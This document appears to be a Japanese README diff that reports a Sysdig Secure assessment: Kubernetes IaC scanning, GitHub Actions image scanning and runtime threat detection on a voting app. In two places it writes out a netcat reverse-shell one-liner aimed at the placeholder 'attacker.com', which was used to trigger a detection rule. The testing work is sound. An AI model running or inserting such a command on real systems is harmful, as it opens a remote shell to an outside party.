TechAssessment - Phase A, B & C 成果レポート このリポジトリでは、Sysdig Secure を活用したセキュリティ検証(IaC / CI/CD / Runtime)を段階的に実施しました。 -| フェーズ | 内容 | 成果リンク | -|----------|------|-------------| -| A | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) | -| B | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) | -| C | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) | +--- -成果詳細:[`docs/assessment-report.md`](./docs/assessment-report.md) +## 📘 フェーズA:IaCおよびRuntime Policies 初期検証 + +### ✅ IaC セキュリティスキャン結果(Sysdig CLI Scanner) + +- スキャン対象: `k8s-specifications/*.yaml` +- 使用ツール: `sysdig-cli-scanner:1.22.4` +- 実行方法: + +```bash +docker run --rm \ + -e SECURE_API_TOKEN=$SYSDIG_SECURE_TOKEN \ + -v $PWD:/iac \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + --apiurl https://app.au1.sysdig.com \ + --iac scan /iac/k8s-specifications +``` + +| レベル | 件数 | 内容例 | +|--------|------|--------| +| 🔴 High | 25 | RunAsUser=root, writeable rootFS, NET_RAW許可など | +| 🟠 Medium | 55 | CPU/Memory制限なし, latestタグ, readiness probeなしなど | +| 🟡 Low | 40 | runAsNonRoot未設定, liveness未定義など | + +### 🛠 修正アクション(IaC) + +- `securityContext.runAsUser: 1000` +- `readOnlyRootFilesystem: true` +- `capabilities.drop: ["ALL"]` +- `resources.requests/limits` を追加 +- `livenessProbe`, `readinessProbe` を明示 +- PR #409 にて修正済みYAMLをコミット + +### ✅ Runtime Policy 初期実装 + +- 使用ルール: `Reverse Shell Detected` +- ポリシータイプ: Workload Policy +- スコープ: `container.label.io.kubernetes.pod.namespace is default` +- アクション: `Generate Event` +- 実行コマンド: + +```bash +kubectl exec -it vote-XXXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f' +``` + +- Sysdig Secure UI にて検知成功(イベント/プロセス/ユーザー確認済) + +--- + +## 📘 フェーズB:CI/CD 連携によるセキュリティスキャン + +### ✅ 実施内容概要 + +- GitHub Actions を用いた自動スキャン +- 対象:Voting App(vote / worker / result)のDockerイメージと IaCファイル +- 使用アクション:`sysdiglabs/scan-action@v6` + +### 🔧 技術構成 + +- `.github/workflows/sysdig-scan.yml` +- CLIバージョン:`1.22.3` +- Secret:`SYSDIG_SECURE_TOKEN` +- 設定:`continue-on-error: true` + +### 🐳 Docker イメージスキャン結果 + +| サービス | イメージ | 脆弱性数(Critical) | Policy評価 | +|----------|---------|----------------------|------------| +| vote | vote-app | 113(3件) | ❌ FAILED | +| worker | worker-app | 174(4件) | ❌ FAILED | +| result | result-app | 119(1件) | ❌ FAILED | + +### 📄 IaC スキャン結果 + +| レベル | 件数 | 主な検出内容 | +|--------|------|----------------| +| 🔴 High | 25 | serviceAccount未指定, root実行 など | +| 🟠 Medium | 55 | resource未設定, latestタグなど | +| 🟡 Low | 40 | liveness/readiness probe未定義 | + +--- + +## 📘 フェーズC:Runtime Policy による脅威検知 + +### ✅ 実施内容概要 + +- `Reverse Shell Detected`, `Unexpected Outbound Connection` を有効化 +- namespace=`default` を対象に設定 +- イベント:Generate Event, Capture(Kill optional) + +### 🛠 実施ステップ + +```bash +kubectl exec -it vote-XXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f' +``` + +### 📡 検知ログ(Secure UI) + +- Threat:Reverse Shell Detected +- 実行ユーザー:root +- プロセス:`nc.openbsd`, `sh` +- 状態:Open +- Capture:取得済み + +--- + +## ✅ 結論 + +- ✅ フェーズA:IaC検知 → PR修正、Runtime Policy初期検知を実証 +- ✅ フェーズB:CI/CD自動スキャンパイプライン構築 +- ✅ フェーズC:Runtime脅威の検出とフォレンジック取得に成功 + +レポート作成日: 2025-07-21 +作成者: Higaki(SETechAssessment 参加者)